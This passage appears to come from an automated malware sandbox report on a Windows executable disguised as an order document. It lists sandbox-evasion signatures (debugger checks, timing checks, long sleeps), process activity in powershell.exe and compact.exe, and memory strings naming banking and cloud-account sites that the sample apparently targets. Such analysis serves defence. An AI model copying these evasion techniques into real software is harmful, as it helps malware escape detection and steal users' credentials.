            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: 4790000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: 7A40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: 8A40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: 9C00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: AF90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: BF90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: D060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: E060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: F060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeMemory allocated: F760000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F096E rdtsc 5_2_013F096E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5097Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2162Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 3386Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 6586Jump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\compact.exeAPI coverage: 2.8 %
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe TID: 1280Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 528Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2632Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112Thread sleep count: 3386 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112Thread sleep time: -6772000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112Thread sleep count: 6586 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112Thread sleep time: -13172000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888Thread sleep time: -51000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\compact.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E2C170 FindFirstFileW,FindNextFileW,FindClose,10_2_02E2C170
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: N77o9w1836.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: N77o9w1836.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: N77o9w1836.10.drBinary or memory string: discord.comVMware20,11696487552f
            Source: N77o9w1836.10.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: N77o9w1836.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: N77o9w1836.10.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: global block list test formVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: N77o9w1836.10.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: firefox.exe, 0000000E.00000002.2792349246.0000019DA522D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: N77o9w1836.10.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: N77o9w1836.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4569047335.00000000008EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: N77o9w1836.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: N77o9w1836.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: compact.exe, 0000000A.00000002.4565290385.00000000030ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq'Vh
            Source: N77o9w1836.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: N77o9w1836.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: N77o9w1836.10.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: N77o9w1836.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: N77o9w1836.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: N77o9w1836.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: N77o9w1836.10.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: N77o9w1836.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: N77o9w1836.10.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: N77o9w1836.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: N77o9w1836.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: N77o9w1836.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F096E rdtsc 5_2_013F096E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00417B13 LdrLoadDll,5_2_00417B13
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01444144 mov eax, dword ptr fs:[00000030h]5_2_01444144
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01444144 mov eax, dword ptr fs:[00000030h]5_2_01444144
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01444144 mov ecx, dword ptr fs:[00000030h]5_2_01444144
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01444144 mov eax, dword ptr fs:[00000030h]5_2_01444144
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01444144 mov eax, dword ptr fs:[00000030h]5_2_01444144
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E0124 mov eax, dword ptr fs:[00000030h]5_2_013E0124
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01448158 mov eax, dword ptr fs:[00000030h]5_2_01448158
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov eax, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov ecx, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov eax, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov eax, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov ecx, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov eax, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov eax, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov ecx, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov eax, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145E10E mov ecx, dword ptr fs:[00000030h]5_2_0145E10E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01470115 mov eax, dword ptr fs:[00000030h]5_2_01470115
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145A118 mov ecx, dword ptr fs:[00000030h]5_2_0145A118
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145A118 mov eax, dword ptr fs:[00000030h]5_2_0145A118
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145A118 mov eax, dword ptr fs:[00000030h]5_2_0145A118
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145A118 mov eax, dword ptr fs:[00000030h]5_2_0145A118
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AC156 mov eax, dword ptr fs:[00000030h]5_2_013AC156
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6154 mov eax, dword ptr fs:[00000030h]5_2_013B6154
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6154 mov eax, dword ptr fs:[00000030h]5_2_013B6154
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014761C3 mov eax, dword ptr fs:[00000030h]5_2_014761C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014761C3 mov eax, dword ptr fs:[00000030h]5_2_014761C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E1D0 mov eax, dword ptr fs:[00000030h]5_2_0142E1D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E1D0 mov eax, dword ptr fs:[00000030h]5_2_0142E1D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0142E1D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E1D0 mov eax, dword ptr fs:[00000030h]5_2_0142E1D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142E1D0 mov eax, dword ptr fs:[00000030h]5_2_0142E1D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AA197 mov eax, dword ptr fs:[00000030h]5_2_013AA197
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AA197 mov eax, dword ptr fs:[00000030h]5_2_013AA197
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AA197 mov eax, dword ptr fs:[00000030h]5_2_013AA197
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014861E5 mov eax, dword ptr fs:[00000030h]5_2_014861E5
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F0185 mov eax, dword ptr fs:[00000030h]5_2_013F0185
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01454180 mov eax, dword ptr fs:[00000030h]5_2_01454180
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01454180 mov eax, dword ptr fs:[00000030h]5_2_01454180
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E01F8 mov eax, dword ptr fs:[00000030h]5_2_013E01F8
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146C188 mov eax, dword ptr fs:[00000030h]5_2_0146C188
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146C188 mov eax, dword ptr fs:[00000030h]5_2_0146C188
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143019F mov eax, dword ptr fs:[00000030h]5_2_0143019F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143019F mov eax, dword ptr fs:[00000030h]5_2_0143019F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143019F mov eax, dword ptr fs:[00000030h]5_2_0143019F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143019F mov eax, dword ptr fs:[00000030h]5_2_0143019F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436050 mov eax, dword ptr fs:[00000030h]5_2_01436050
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AA020 mov eax, dword ptr fs:[00000030h]5_2_013AA020
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AC020 mov eax, dword ptr fs:[00000030h]5_2_013AC020
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE016 mov eax, dword ptr fs:[00000030h]5_2_013CE016
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE016 mov eax, dword ptr fs:[00000030h]5_2_013CE016
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE016 mov eax, dword ptr fs:[00000030h]5_2_013CE016
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE016 mov eax, dword ptr fs:[00000030h]5_2_013CE016
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01434000 mov ecx, dword ptr fs:[00000030h]5_2_01434000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01452000 mov eax, dword ptr fs:[00000030h]5_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DC073 mov eax, dword ptr fs:[00000030h]5_2_013DC073
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B2050 mov eax, dword ptr fs:[00000030h]5_2_013B2050
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01446030 mov eax, dword ptr fs:[00000030h]5_2_01446030
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014320DE mov eax, dword ptr fs:[00000030h]5_2_014320DE
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014360E0 mov eax, dword ptr fs:[00000030h]5_2_014360E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B208A mov eax, dword ptr fs:[00000030h]5_2_013B208A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AC0F0 mov eax, dword ptr fs:[00000030h]5_2_013AC0F0
